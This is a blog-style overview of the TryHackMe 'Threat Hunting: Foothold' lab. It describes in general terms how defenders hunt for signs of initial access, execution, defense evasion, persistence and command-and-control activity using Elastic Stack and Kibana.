Threat Hunting Techniques in Cyber Security | TryHackMe Threat Hunting: Foothold
We covered threat hunting in-depth, compared threat hunting with incident response, covered a MITRE-based approach to hunt for threats based on attackers’ tactics and techniques such as initial access, execution, defense evasion and persistence using Elastic Stack and Kibana. We covered a practical scenario using TryHackMe Threat Hunting: Foothold for demonstration.
Threat Hunting | Initial Access
The Initial Access Tactic (TA0001) represents adversaries’ techniques and strategies to breach an organisation. This stage of an attack cycle predominantly focuses on delivering the payload to the target system or network. The primary objective during this phase is to gain a foothold in the network, which can be achieved through a variety of means, such as:
- Social Engineering techniques such as phishing.
- Exploiting vulnerabilities through public-facing servers.
- Spraying credentials through exposed authentication endpoints.
- Executing commands through malicious flash drives.
- Installing cracked software with hidden malicious code.
As the attack techniques are varied, our hunting strategies should also be multifaceted and adaptable. Our goal is to identify signs of the various methods outlined above. Hence, we will use the following scenarios to build our hunting methodology:
- Brute-forcing attempts via SSH.
- Exploitation of a web application vulnerability.
- Phishing via links and attachments.
Threat Hunting | Execution Phase
The Execution phase can manifest in several ways, and recognising these signs can be complex due to the many potential execution methods an adversary might employ. However, it all boils down to executing a malicious command.
Unusual process creation, network connections, file modifications, and many more traces can indicate malicious execution. Recognising these red flags requires an in-depth understanding of typical endpoint behaviour and a keen eye for spotting anomalies. In line with these, we will use the following scenarios to build our hunting methodology:
- Suspicious usage of command-line tools.
- Abuse of built-in system tools.
- Execution via programming/scripting tools.
Threat Hunting | Defense Evasion Phase
Despite adversaries’ attempts to evade detection, their activities inevitably leave traces in these logs, providing us with potential leads. With these, we will use the following scenarios to uncover the traces of this tactic:
- Disabling security software.
- Log deletion attempts.
- Executing shellcode through process injection.
Threat Hunting | Persistence Phase
The hunt for persistence involves detecting the system’s subtle changes and activities. This may entail identifying unrecognized or unexpected scripts running at startup, spotting unusual scheduled tasks, or noticing irregularities in system registry keys. We will use the following scenarios to learn more about the traces left when threat actors implant persistence mechanisms.
- Scheduled Task creation.
- Registry key modification.
Threat Hunting | Command and Control Phase
The hunt for Command and Control involves uncovering these covert communication channels amidst regular network traffic. Adversaries use standard protocols to blend in with typical network traffic or use cloud storage services as unconventional command channels to avoid raising suspicion. In the following sections, we will delve deeper into strategies and techniques for hunting Command and Control activities, interpreting network events, and recognising anomalies through the following scenarios:
- Command and Control over DNS.
- Command and Control over third-party cloud applications.
- Command and Control over encrypted HTTP traffic.
Room Answers | Threat Hunting: Foothold
Room answers can be found here.
